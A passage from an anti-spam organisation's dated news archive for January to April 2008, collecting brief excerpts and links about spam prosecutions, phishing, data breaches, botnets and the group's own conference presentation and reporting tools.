prosecuting intellectual property crimes, which led to a 7 percent
increase in the number of IP cases filed in 2007 over the year before and
a 33 percent increase over 2005. "Criminal syndicates, and in some cases
even terrorist groups, view IP crime as a lucrative business and see it as
a low-risk way to fund other activities," Mukasey said. "A primary goal of
our IP enforcement mission is to show these criminals that they're
wrong."...
(cbsnews.com)
April 9, 2008
The State Department official in charge of U.S. passport services stepped
down yesterday amid investigations into security breaches in the document
records and overcharges for blank passports. In the latest blow against
the agency, court documents show a State Department employee provided
personal information from passport applications for use in a credit-card
fraud scheme. Deputy Assistant Secretary for Passport Services Ann Barrett
left her post yesterday, a move that State Department Spokesman Tom Casey
attributed to management changes. The personnel move comes after The
Washington Times first reported last month that three State Department
contract employees were being investigated for improperly accessing the
passport data of three presidential candidates. The Times also has
reported on overcharges for blank passports produced by the U.S.
Government Printing Office... (washingtontimes.com)
April 8, 2008
Webroot estimates over 42,000 spam emails for every single business email
account in 2008 (ciol.com)
April 7, 2008
The online behavior of a small but growing number of computer users in the United States is monitored by their Internet service providers, who have access to every click and keystroke that comes down the line.
The companies harvest the stream of data for clues to a person's interests, making money from advertisers who use the information to target their online pitches.
(washingtonpost.com)
April 6, 2008
Technical analysis of the Phorm online advertising system has reinforced an expert's view that it is "illegal".
(news.bbc.co.uk)
April 5, 2008
Internet crime is at an all time high, according to figures from the FBI, which said that losses totalled $240m last year.
The agency's Internet Crime Complaint Center (IC3) received 206,884 complaints of web-based crimes in the US last year, and said that total losses had risen by $40m compared to the previous year.
"The internet presents a wealth of opportunity for would-be criminals to prey on unsuspecting victims, and this report shows how extensive these types of crime have become," said FBI Cyber Division assistant director James E. Finch.
(vnunet.com)
April 4, 2008
WASHINGTON (AP) — Money lost in Internet-related crimes hit a new high last year, topping about $240 million, according to a government report showing increases in scams involving pets, check-cashing schemes and online dating.
The number of reported Internet scams dropped slightly from previous years, but the total lost jumped $40 million, according to the report released Thursday by the FBI and the National White Collar Crime Center.
(ap.google.com)
April 3, 2008
Spam continues to blight e-mail exactly 15 years after the term was first coined and almost 30 years since the first spam message was sent.
The term is thought to have been coined by Joel Furr, an administrator on the net discussion system Usenet, to refer to unsolicited bulk messages.
More than 90% of all e-mail is spam, according to anti-spam body Spamhaus.
(bbc.co.uk)
April 2, 2008
Framingham retailer TJX Cos. reached a settlement with MasterCard Inc. in which it will pay up to $24 million to banks and other institutions to cover fraud losses stemming from a massive data breach disclosed last year.
TJX, parent of discount retain chains including TJ Maxx and Marshalls, struck a similar deal with rival card network Visa in which it agreed to pay up to $40.9 million. As in that deal, TJX said the costs of its MasterCard settlement are included in the $256 million the company has set aside to pay for computer work and other costs associated with the breach.
(boston.com)
April 1, 2008
When the U.S. Federal Trade Commission announced a US$2.9 million settlement with online marketing firm ValueClick this month, it was a record monetary settlement under the 4-year-old CAN-SPAM Act...
But despite these recent court cases, some critics don't see a lot of value in CAN-SPAM, short for Controlling the Assault of Non-Solicited Pornography and Marketing.
"CAN-SPAM has had virtually no impact on the spam problem at large," said Ray Everett-Church, a longtime spam fighter and director of policy and professional services at Habeas, a company that provides e-mail authentication services.
March 31, 2008
KnujOn's Policy Enforcement model finished right behind the "best overall paper",
Jonathan Zdziarski's research on Reasoning-Based Adaptive Parsing (PDF).
Congratulations to Jonathan and special thanks to Bill Yerazunis of
the Mitsubishi Electric Research Laboratories (MERL) for running this event.
March 30, 2008
For more than a year the ORDB blacklist, which had previously been in heavy use, has been empty. Every DNS query to the relays.ordb.org zone would result in the error message, "non-existent".
To report a hit, DNS queryable blacklists (DNSBLs) usually respond with an IP address in the 127.x.x.x range and since Tuesday, the name server responsible for the name range under relays.ordb.org does just that for every query, such as 4.3.2.1.any.relays.ordb.org. Andreas Plesner Jacobsen, a former ORDB operator, explained to heise online sister publication iX that this measure has been introduced because the zone is still swamped with queries. The intention is to get mail server operators to stop using ORDB. Simply deleting the domain was not a viable alternative, since the load would then merely be directed to the .org name server.
Admins should check their mail server and spam filter configurations to make sure that ORDB is not in use. This should be relatively easy to determine in most cases, since positive responses from DNSBLs often result in emails being filtered and in this case would completely stop email traffic. A somewhat more complicated scenario is when DNSBL responses are taken into account as just one of a number of spam criteria. In that case, yesterday's new measure would only gradually become known to postmasters still using ORDB.
(heise-online.co.uk)
March 29, 2008
Herndon, Va.-based Network Solutions said Wednesday that it suspended Hizbollah.org, an official site of Hezbollah, a Lebanese political and paramilitary group.
Turns out, Network Solutions, which was one of the original firms in the domain registration business, was accepting payment for the domain in violation of a U.S. law that bars American companies from doing business with organizations listed by Uncle Sam as terrorist groups. Closer inspection also reveals that Network Solutions and other U.S.-based Internet service providers and domain registrars provide services to other groups on the government's list of terrorist organizations.
(blog.washingtonpost.com/securityfix)
March 28, 2008
Knujon was presented Thursday and created considerable discussion.
(spamconference.org).
March 27, 2008
Knujon is being presented at the annual MIT Spam Conference
(spamconference.org). Dr. Robert Bruen, will be conducting the presentation at 2:15PM Thursday in the Stata center.
Our presentation represents a critical shift in the last ten years of anti-spam. The topics usually discussed at this forum are focused
on filtering algorithms, smtp protocol design, and spam blacklisting. The presentation of KnujOn's policy enforcement and illicit
network termination work will bring a new perspective to the fight against Internet abuse and electronic fraud.
Thanks for your support of our mission.
March 26, 2008
It's about time, Spanish is only the most widely spoken language in the world. Some subject lines:
"Construya Indicadores Integrales con el Balanced Scorecard. Publicidad . neszs"
"NEGOCIACION GANAR GANAR O NO HAY TRATO. PUBLICIDAD . o0j3w"
"INFORME DE SUMA IMPORTANCIA. Publicidad . 0dmuq"
"PARA SECRETARIAS - EL MEJOR CONGRESO 2008. PUBLICIDAD . 912t6"
"TE ESPERAMOS. LLAMANOS . 472-8846 . m2pbj"
"LUCE TU MEJOR SONRISA...!!!. Publicidad . pvlp"
¡Knujon lucha spam de tu correo! envíe aquí
March 25, 2008
Automate Outlook for Knujon and make a custom toolbar button
March 24, 2008
Valid topics for 2008 include not just plain spam, but "other cybercrimes" such as phishing, IM spam, SMS spam, MMORPG spam, blog spam, trackback spam, photo spam, stock pump-and-dumps, email con games, exploit marketing, zombie bots and bot armies, setting up antispam systems, and antispam countermeasures including hardware, software, wetware, and blue-ware.
(spamconference.org)
March 23, 2008
The FBI has opened a preliminary investigation of a report that China-based hackers have penetrated the e-mail accounts of leaders and members of the Save Darfur Coalition, a national advocacy group pushing to end the six-year-old conflict in Sudan.
(washingtonpost.com)
March 22, 2008
March 21, 2008
PORTLAND, Maine (AP) — At first, it sounded like another in a long line of credit card breaches:
Up to 4.2 million account numbers were stolen by thieves who cracked computers at Hannaford Bros. Co.,
an Eastern supermarket chain. But the specifics of the crime, revealed this week, included some troubling
twists that might expose big holes in the payment industry's security standards. (ap.google.com)
Hannaford's Investigating Fraud After Security Breach (wptz.com)
Hannaford fraud linked to pin transactions (blogs.computerworld.com)
Hannaford logo's disappearing act (boston.com)
March 20, 2008
Vital business emails are going astray, intercepted and quarantined by
YahooXtras spam filters without the knowledge of the sender or the
receiver. Wellington-based Graphic Dimensions, which provides IT support and
services to architectural design companies, has had problems sending email
to xtra.co.nz addresses since the beginning of February. Email from the company, which is also an Xtra customer, is classified by
the YahooXtra mail filter as spam, says Graphic Dimensions technical director, Paul OBrien.
This is causing problems for Graphic Dimensions because important messages
from its clients, primarily architects, to contractors are going AWOL,
OBrien says.
(computerworld.co.nz)
March 19, 2008
Another company has settled charges today with the Federal Trade
Commission over violations of the CAN-SPAM Act, netting the FTC another
$2.9 million in civil penalties. Online advertiser ValueClick and its
subsidiaries were charged with using deceptive e-mails, banner ads, and
pop-ups to drive traffic, as well as a failure to secure customers'
financial information. The settlement is the largest in CAN-SPAM's
five-year history, says the FTC, and bars the companies from any further
violations. (arstechnica.com)
March 18, 2008
Even magazines can be brandjacked...
...diverts users to this site:
Real Men's Health site is here: menshealth.com
Obviously an unwitting victim, but are they liable?
"
If they don't act soon, frequently-phished companies may be held liable for crimes committed in their names
" (darkreading.com). Knujon has notified Men's Health but they have not responded or taken any action
against the fake pharmacy website.
March 17, 2008
A Ukrainian man once known as one of the top ringleaders in Eastern Europe-based organized cyber crime is now heading up a new political party there.
Dmitry Ivanovich Golubov, a 24-year-old from Odessa, is leading the upstart "Internet Party of Ukraine," a party he helped create shortly after parliamentary elections in the country last fall. In 2005, Golubov -- a.k.a. "script" -- was arrested and jailed on charges of trading in credit and debit card credentials stolen via computer viruses and password-snatching Trojan horse programs, thefts that caused millions of dollars in losses to banks over several years. (washingtonpost.com)
March 16, 2008
Security vendor Trend Micro has fallen victim to a widespread Web attack that splashed malicious software onto hundreds of legitimate Web sites in recent days.
(washingtonpost.com)
March 15, 2008
Robert Soloway, dubbed the "spam king" for having sent millions of
unwanted e-mails around the globe, pleaded guilty today to mail fraud,
fraud in connection with electronic mail and failing to file a tax return.
(nwsource.com)
March 14, 2008
There’s a common problem in Windows XP that can make network browsing very slow.
If the 'My Network Places' folder contains a shortcut to a network share, then each refresh of the explorer window will attempt to read icon information from every file in the remote location, causing the system to slow to a crawl.
Removing all shortcuts from 'My Network Places' will return the system response to normal.
(ss64.com)
March 13, 2008
~Video~
(cnn.com)
March 12, 2008
ZHOUSHAN, China (CNN) -- They operate from a bare apartment on a Chinese island. They are intelligent 20-somethings who seem harmless. But they are hard-core hackers who claim to have gained access to the world's most sensitive sites, including the Pentagon.
(cnn.com)
March 11, 2008
Russian security vendor Kaspersky Lab has a prototype version of its virus protection software waiting in the wings in case Apple Mac OS X suddenly becomes a target of choice for hackers.
(washingtonpost.com)
March 10, 2008
An adult Web site whose affiliates sent pornography-related spam to
unsuspecting recipients will pay $413,000 (207,000) to settle a complaint
from the US Federal Trade Commission.
(computerworlduk.com)
March 9, 2008
Many
links on the discussion group site link to pxxx aggregators, some of which
redirect to malware sites pushing Trojan horse malware (such as VirusHeat)
disguised as video codecs.
(theregister.co.uk)
March 8, 2008
Rod Rasmussen, president and CTO of anti-phishing vendor, Internet
Identity, said the company has primarily focused on the US market, but is
now seeing a rapid increase in phishing activity beyond North America and
Europe.
(zdnet.com.au)
March 7, 2008
A court in Virginia has struck down a spammer's appeal that his conviction
violated his rights to free speech.
Jeremy Jaynes was named as one of the world's top 10 spammers in 2003 by
watchdog Spamhaus, and was estimated by prosecutors to be pumping out 10
million emails a day netting him US$750,000 per month.
(itnews.com.au)
March 6, 2008
LONDON — YouTube is facing criticism for making it too easy for people to upload violent or sexually explicit content to the Internet after a 25-year-old mother was filmed while being raped.
(foxnews.com)
March 5, 2008
March 4, 2008
Six botnets are responsible for 85 per cent of all spam, according to an
analysis by net security firm Marshal.
(theregister.co.uk)
March 3, 2008
A divided Virginia Supreme Court affirmed the nation's first felony
conviction for illegal spamming on Friday, ruling that Virginia's
anti-spamming law does not violate free-speech rights.
Jeremy Jaynes of Raleigh, N.C., considered among the world's top 10
spammers in 2003, was convicted of massive distribution of junk e-mail and
sentenced to nine years in prison.
Almost all 50 states have anti-spamming laws. In the 4-3 ruling, the court
rejected Jaynes' claim that the state law violates both the First
Amendment and the interstate commerce clause of the U.S. Constitution
(dailyreportonline.com)
March 2, 2008
A serial junk-mailer known as the "Spam King" will appear in a Seattle
court next month, in a criminal trial being hailed as a major blow in the
fight against unsolicited emails.
(computerworlduk.com)
March 1, 2008
Top brands face up to 10,000 "brandjacking" incidents a week from
cybersquatters who are trying to pass off fake sites as genuine, according
to new statistics from researcher MarkMonitor.
(computerweekly.com)
February 29, 2008
Hotmail suffered a worldwide outage Tuesday as Microsoft Corp. deals with technical difficulties.
Hotmail, one of the world's leading e-mail services, was not working the majority of the day on Tuesday. The outage problems also affected MSN and Microsoft's Windows Live portal.
(transworldnews.com)
February 28, 2008
Comcast pushed back at a barrage of criticism yesterday that the huge telecom company was deliberately blocking file-sharing by some Internet users.
Appearing at a special Federal Communications Commission hearing yesterday at Harvard Law School, representatives from Comcast rejected accusations that it was hassling certain Internet users for competitive reasons.
(bostonherald.com)
February 27, 2008
(CNN) -- An apparent move by the Pakistani government to block YouTube, the popular video-sharing Web site, knocked out access to the site worldwide for more than two hours, Internet analysts say. (cnn.com)
February 26, 2008
Kabul: The Taliban on Monday warned mobile telecommunication service companies to shut down at night their booster towers in Taliban-held areas in Afghanistan within three days, a statement released by the militants said.
“We are calling on all cellular phone service companies to shut down their activities from 5 pm to 7 am (local time) next day in Taliban-held areas within three days,” the statement read out by the outfit's purported spokesman Zabihullah Mujahid to media outlets in south Afghanistan said.
(sify.com)
February 25, 2008
CONCORD, N.H.—Attorney General Kelly Ayotte has agreed to mediate a dispute between the New Hampshire Troopers Association and the New Hampshire Highway Patrol Association.
In a lawsuit filed in 2006, the troopers union accused the highway patrol group of registering several Internet domain names that either deceived the public into sending money to the wrong group or directed visitors to sites that disparaged the troopers. In a counter claim, the highway patrol group accused state troopers of libel for trying to scuttle a highway patrol speed trap by warning motorists to slow down.
(boston.com)
February 24, 2008
SAN FRANCISCO -- Wanted: computer virus writers. Must be fluent in Mandarin. Or Russian. Or Portuguese.
These hacker help wanted ads are appearing on underground Internet channels as malicious code designers increasingly want programmers with foreign-language skills to help launch country-specific attacks, security vendor McAfee Inc. said in a report Thursday. (washingtonpost.com)
February 23, 2008
According to research from Trend Micros TrendLabsSM, hackers are
intensifying their attacks on legitimate Web sites. It debunks the adage
to not visit questionable sites just because a user visits a gambling or
adult-content site doesnt necessarily mean Web threats are lurking in the
shadows; the site with the latest sports news or links in a search engine
result, however, could potentially infect visitors with malware.
(prosecurityzone.com)
February 22, 2008
In the wake of the recent malvertising incidents, it's about time we get to the bottom of the campaigns, define the exact hosts and IPs participating, all of their current campaigns, and who's behind them. Who's been hit at the first place? Expedia, Excite, Rhapsody, MySpace, all major web properties. (ddanchev.blogspot.com)
February 21, 2008
Canadian police have arrested 17 people suspected of running a huge botnet
of compromised PCs. Up to one million computers in various countries were
allegedly under the control of the suspects, who range in ages from 17 to
26. All but one are male, UPI reports.
(theregister.co.uk)
February 20, 2008
WASHINGTON The federal government is falling farther and farther behind
its fight against cybercrime and, despite an increase in the amount of
resources being allocated to address the problem, it will continue to
struggle without a lot of help from law enforcement agencies at the state,
local and international levels, current and former government security
officials say.
(searchsecurity.techtarget.com)
February 19, 2008
The past few years has seen a major change in the world of cybercrime. The
sheer number of crimes has increased substantially, but thats not the
whole story. Merely increasing the amount of money and people that your
company throws at the problem is no longer enough to keep pace with the
changes. Cybercrimes, and the cybercriminals that perpetrate them, have
evolved. To protect your company from the new wave, your methods and
attitudes must evolve too.
(contractoruk.com)
February 18, 2008
TOKYO Police on Friday said they have arrested a man for sending 2.2
billion spam emails with fake sender information. Yuki Shiina, 25, was
arrested for allegedly sending nine spam emails, which were ads for
gambling and dating services, with fake sender information on Nov 13,
2007, after an Internet service provider reported to police that he was
sending massive amount of emails last September (japantoday.com)
February 14, 2008
The BlackBerry outage, the service's second major interruption since April 2007, began at about 3:30 p.m. New York time Monday. Service was restored roughly three hours later, the company said in a statement. No messages were lost. Calling and text-messaging services weren't affected.
Research In Motion said in a statement issued late Tuesday afternoon that the outage was caused by "a problem with an internal data routing system within the BlackBerry service infrastructure that had been recently upgraded." The company has been upgrading capacity throughout its server farms to accommodate growing demand for its BlackBerry services.
(news.com)
February 13, 2008
The numbers of malicious programs circulating online is hitting an unprecedented high, say experts.
(news.bbc.co.uk)
February 12, 2008
Of the top 20 companies targeted by phishing in 2007, the report says, 19 are in the banking industry.
Computer users are often tricked into visiting fraudulent sites because of "danger, danger" e-mail subject lines like "account security measures," "important notice" or "(your bank name) security notice."
One sneaky thing some malware (malicious threats) does is to modify a user's server information.
For example, a user types www.bankofamerica.com into his or her browser. But instead of the computer using the service provider's server, which would take the user to the real Bank of America server, the computer uses a bogus server run by phishers -- and that takes the user to a fake Bank of America server.
The phishers take the user's login information and empty the account.
(cnn.com)
February 11, 2008
Russia might be a country trying to regain superpower status, but it has
already reached it in one less welcome area the amount of spam it sends
to the world.
(techworld.com)
February 10, 2008
For the longest time, it had been botnet-infected (define) computers in
the U.S. that pumped out the bulk of offers for mortgages and herbal
Viagra, which comprised a staggering 78.5 percent of all e-mail floating
around on the Internet according to Symantec.
(internetnews.com)
February 9, 2008
European spam networks have pumped out more unsolicited e-mail than those
in the U.S. for the third month in a row, according to security vendor
Symantec. (news.com)
February 8, 2008
Judge David Coar of the U.S. District Court for the Northern District of
Illinois, Eastern Division, has also ordered Sili Neutraceuticals and owner
Brian McDaid to pay nearly US$2.6 million for allegedly making false
advertising claims and sending e-mail messages in violation of the FTC Act and
the CAN-SPAM (networkworld.com)
February 7, 2008
REDMOND, Wash. Feb. 4, 2008 Prison sentences handed down to
counterfeiters by a Taipei, Taiwan, court mark the end of a string of
successful prosecutions by international law enforcement agencies,
bringing a global software counterfeiting ring to a final halt. Between
1997 and 2003, Huang Jer-sheng, owner of the Taipei-based distributor
Maximus Technology Inc., and his associates were responsible for the
production and distribution of more than 90 percent of the high-quality
counterfeit Microsoft software products either seized by law enforcement
or test-purchased around the world.
(microsoft.com)
February 6, 2008
NEW YORK -- The U.S. Attorney in Manhattan announced that more than $1
billion in
assets were seized last year from companies and individuals accused of
fraud and
other wrongdoing. -Prosecutors said much of the $1.1 billion in assets
included
seizures from Wall Street scams, the Oil-For-Food Scandal, public
corruption and
international drug rings.
(wnbc.com)
February 5, 2008
NEWS.com.au takes you inside the secretive online world of Islamic
extremists
with
a special report on how they are using the latest technology to drive
propaganda
campaigns, cheering Australian troop deaths and mocking our political
leaders.
(news.com.au)
February 4, 2008
A do-it-yourself phishing kit, which makes it easy for inexperienced
scammers to
target users of popular social networking websites such as Orkut, MySpace
and
Facebook and webmail platforms like Yahoo and Hotmail, was found by
researchers
from FaceTime Communications this week. (scmagazineus.com)
February 3, 2008
Pharmacologist Dora Akunyili is a remarkably honest woman. The trait
earned her a job as Nigeria's pharmaceutical industry enforcer. Her campaign against
the country's counterfeiters has put her life in danger, but she has no plans
to back down.
(spiegel.de)
February 2, 2008
Thanks to Thunderbird, SecondWheel, CyberTopCops, and SoftPedia we have some great utilities and
instructions. SecondWheel has added a number of
options
to his already excellent KnujOn Thunderbird Extension.
KnujOn Thunderbird Extension (secondwheel.googlepages.com)
Transform Your PC Into a Spam Reporting Machine (cybertopcops.com)
Thunderbird extension that Forwards all emails marked Junk (as attachments) to KnujOn.com (softpedia.com)
February 1, 2008
Craigslist ads lead police to prostitute ring (azcentral.com)
Traveling 'circuit girls' flock to Super Bowl (sportingnews.com)
"A lot of girls are advertising on the Internet" (foxnews.com)
January 31, 2008
DUBAI, United Arab Emirates (CNN) -- High-technology services across large tracts of Asia, the Middle East and North Africa were crippled Thursday following a widespread Internet failure which brought many businesses to a standstill and left others struggling to cope.
Industry experts are blaming damage to two undersea cables but it is not known what caused the damage.
Reports say that Egypt, Saudi Arabia, Qatar, the United Arab Emirates, Kuwait, Bahrain Pakistan and India, are all experiencing severe problems.
(cnn.com)
January 30, 2008
FORT WORTH, Texas --
An international gang of cyber criminals hacked into OmniAmerican Bank's records, the bank's president disclosed Wednesday.
(sunherald.com)
January 29, 2008
LOS ANGELES, California (AP) -- A revamped online file-sharing service that promised to offer unlimited, free music downloads from all the major record labels hit an apparent snag Sunday after one denied it had given the service permission.
(cnn.com)
January 28, 2008
A 15-year-old Florida girl's MySpace page has been hijacked and defaced with sexually explicit and hateful content, Tampa Bay affiliate FOX 13 reported, raising questions about security on Internet networking sites and what is being done to improve it.
(foxnews.com)
January 27, 2008
PARIS (AP) — Police on Saturday questioned the young trader blamed for a massive fraud that cost France's Societe Generale bank more than $7 billion, as the country's president accused global financial institutions of having "gone haywire" and urged common sense.
(ap.google.com)
January 26, 2008
A Michigan woman is under arrest after being accused of using Craigslist to find someone to kill a Northern California woman.
Federal investigators said 49-year-old Ann Marie Linscott contacted several people through Craigslist.org.
(kcra.com)
January 25, 2008
JACKSONVILLE, FL -- The target may be high-tech, but the emotion involved is as old as humanity. Spite, anger, and revenge. Police say that's what filled a woman's heart after she picked up the classified ads. (firstcoastnews.com)
January 24, 2008
BEIJING (Reuters) - China shut down 44,000 Web sites and homepages and arrested 868 people last year in a campaign against Internet porn which will continue until the end of this year's Beijing Olympics, Xinhua news agency said on Wednesday.
(thestar.com.my)
January 23, 2008
A Moroccan group called "Mr. Brain" is offering free phishing kits on a Web site hosted in France, said Paul Mutton, Internet services developer at Netcraft, a security company in Bath, England.
The software packages make it easy to quickly set up a fraudulent Web site mimicking a known brand in order to trick people into divulging credit card details or bank account numbers. Templates for spam e-mail are also included, targeting brands such as Bank of America, eBay, PayPal, and HSBC.
(infoworld.com)
January 22, 2008
The repercussions for cybercriminals are finally coming in line with the severity of their crimes. With international computer crime authorities joining efforts in a bid to bring down hackers, malware authors and spammers, the past 12 months have seen more arrests and harsher sentencing for criminals involved in high-profile crimes. Below are some of the cases that made the news in just in the second half of 2007. (net-security.org)
January 21, 2008
Sharon D. Richards, 43, of Sacramento has been sentenced to five years in prison after pleading guilty to hacking an online bank account of another person and writing more than $200,000 in checks on it.
The case began when the victim’s purse was stolen. (centralvalleybusinesstimes.com)
January 20, 2008
A consortium of British and US military agencies and defense and aerospace firms have agreed a new standard for secure email. Security experts are watching the developments closely, but are unsure how much of the specification will make it into public use or commercial email security products. (theregister.co.uk)
January 19, 2008
Several cities outside the U.S. have sustained attacks on utility systems and extortion demands. Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. Central Intelligence Agency analyst said this week.
Speaking at a conference of security professionals on Wednesday, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.
(pcworld.com)
January 18, 2008
North Dakota Judge Gets it Wrong: ...WAY wrong. This is just mind blowing.
Ever been prosecuted for tracking spam? Running a traceroute? Doing a zone transfer? Asking a public internet server for public information that it is configured to provide upon demand?
No? Well, David Ritz has. And amazingly, he lost the case.
Here are just a few of the gems that the court has the audacity to call ”conclusions of law.” Read them while you go donate to David’s legal defense fund. He got screwed here, folks, and needs your help.
“Ritz’s behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law.” You might not know what a zone transfer is, but I do. It’s asking a DNS server for all the particular public info it provides about a given domain. This is a common task performed by system administrators for many purposes. The judge is saying that DNS zone transfers are now illegal in North Dakota.
(circleid.com)
January 17, 2008
Russian reserchers released program for automated Yahoo! CAPTCHA recognition.
(network-security-research.blogspot.com)
The Decline of CAPTCHA
Spammers use porn to get unsuspecting users to break CAPTCHA codes
Captcha bypassed
January 16, 2008
The "random js toolkit" is a Javascript code that is created dynamically
and provides a random filename that can only be accessed once. As a
consequence, it changes every time it is accessed. The dynamic embedding,
known as "code obfuscation," is done in such a selective manner that once
a user has received a page with the embedded malicious code, it will not
be referenced again during future visits. (linuxinsider.com)
January 15, 2008
ALBANY, New York (AP) -- MySpace has reached an agreement with more than 45 states to change to help prevent sexual predators and others from misusing it, state officials said Monday.
Several states' attorneys general said in a statement that the huge social networking Web site has agreed to add several protections and participate in a working group to develop new technologies, including a way to verify the ages of users. Other social networking sites will be invited to participate (cnn.com)
January 14, 2008
Your cell phone rings, you pick up, say "hello" and hear tones. This is a "fax blast." A program calls numbers in a list or
at random and attempts to fax an unsolicited advertisement. You can fight back.
(303) 296-2573
Whocallsme.com: Look up numbers calling in fax and cell spam
whocalled.us
800notes.com
More on Junk Faxes
January 13, 2008
The same cell phones that parents buy as safety devices for their children are the gadgets that pedophiles and predators use to prep kids for sexual encounters, experts and police say. (cnn.com)
January 12, 2008
Facebook users are being warned about a new application on the social networking site that contains adware.
'Secret Crush' contains a download of the Zango adware program which automatically sends itself to five friends (vnunet.com)
January 11, 2008
Viruses, malware and online crime are evolving from the realm of geeks into a major shadow economy that closely mimics the real world.
Maksym Schipka, a senior architect at security firm MessageLabs, claims to have identified a sophisticated online black market with tens of thousands of participants. (vnunet.com)
January 10, 2008
"Certainly the criminals have moved downstream to smaller financial institutions," said Avivah Litan, a vice president and research director at Gartner Inc. in Stamford, Conn. "That's been the trend for well over a year, because the larger banks have employed services to take these phishing command and control services down. So criminals would rather use brands that are not going to go after them. It's easier to attack smaller banks that haven't geared up to protect themselves. They can go undetected. And as soon as they are detected, these smaller banks are caught off guard." (searchcio-midmarket.techtarget.com)
January 9, 2008
This is Notice of Class Action Lawsuit and Proposed Settlement ("Notice") of a proposed settlement in a class action lawsuit. The Settlement would resolve a lawsuit brought on behalf of individuals who received phone calls or faxes allegedly made by or on behalf of independent distributors of Herbalife International, Inc. ("Herbalife"). (tcpasettlement.com)
More on Junk Faxes
January 8, 2008
Our labs(McAfee) trapped many thousands of spam overnight that are abusing the Windows Live SkyDrive Beta service launched in August last year (or rather it’s the new name for Windows Live Folders…). The service allows you to upload up to 1Gb of files and share them with anyone via weblinks. The trapped pill spam promises the usual assurances: (avertlabs.com)
January 7, 2008
The Internet is boundless and cybercrime scenes stretch from personal desktops across the fiber networks that circle the globe. Digital forensic investigators like Harold Phipps, vice president of industry relations at Norcross Group in Norcross, Ga., routinely slip across conventional geographic jurisdictions in pursuit of digital evidence and wrongdoers. (baselinemag.com)
January 6, 2008
Office of Critical Infrastructure Protection and Compliance Policy (treas.gov)
OnGuardOnline.gov provides practical tips from the federal government and the technology industry to help you be on guard against Internet fraud, secure your computer, and protect your personal information. (onguardonline.gov)
January 5, 2008
The US Department of Justice went public today with the indictment of Alan Ralsky and 10 others who helped him. Alan Ralsky topped our Top 10 Worst Spammers list for quite some time and was involved in almost any sort of spam activity that's being done. He and his gang frequently sent millions of spam messages per day. In recent years his focus has been on stock spam, and that's a key part of what the US DOJ indicted him for. (spamhaus.org)
January 4, 2008
Eleven people, including one of the top spammers in the world, were indicted on Thursday for allegedly sending millions of unsolicited e-mails intended to inflate the price of Chinese penny stocks. (washingtonpost.com)
January 3, 2008
It's getting more and more difficult to do any kind of domain research without running the risk of losing your domain ideas to unscrupulous domain tasters. (dailydomainer.com)
January 2, 2008
A way of double spamming - combo of spamming email users and mailing lists to get a profit:
#1 Spammer sends a spam e-mail to a mailing list that doesn't have rigorous moderating - in this case netbsd-docs. The post is mirrored online.
#2 Spammer then sends actual spam e-mails that pass through anti-spam filters (Mail application locally categorizes it as junk) with direct links to a link on a rather well known domain. (net-security.org)
January 1, 2008
On November 13, 2007 Prosecutors from the Directorate for Investigating Organized Crime and Terrorism arrested 9 of the 22 persons who were charged for the crimes of setting up an organized criminal group, computer fraud, fraudulent use of electronic payment instruments, and production and maintenance of equipment needed to counterfeit electronic payment instruments. (scamfraudalert.com)
News from 2007 has been archived.
News from 2006 has been archived.
News from 2005 has been archived.
|
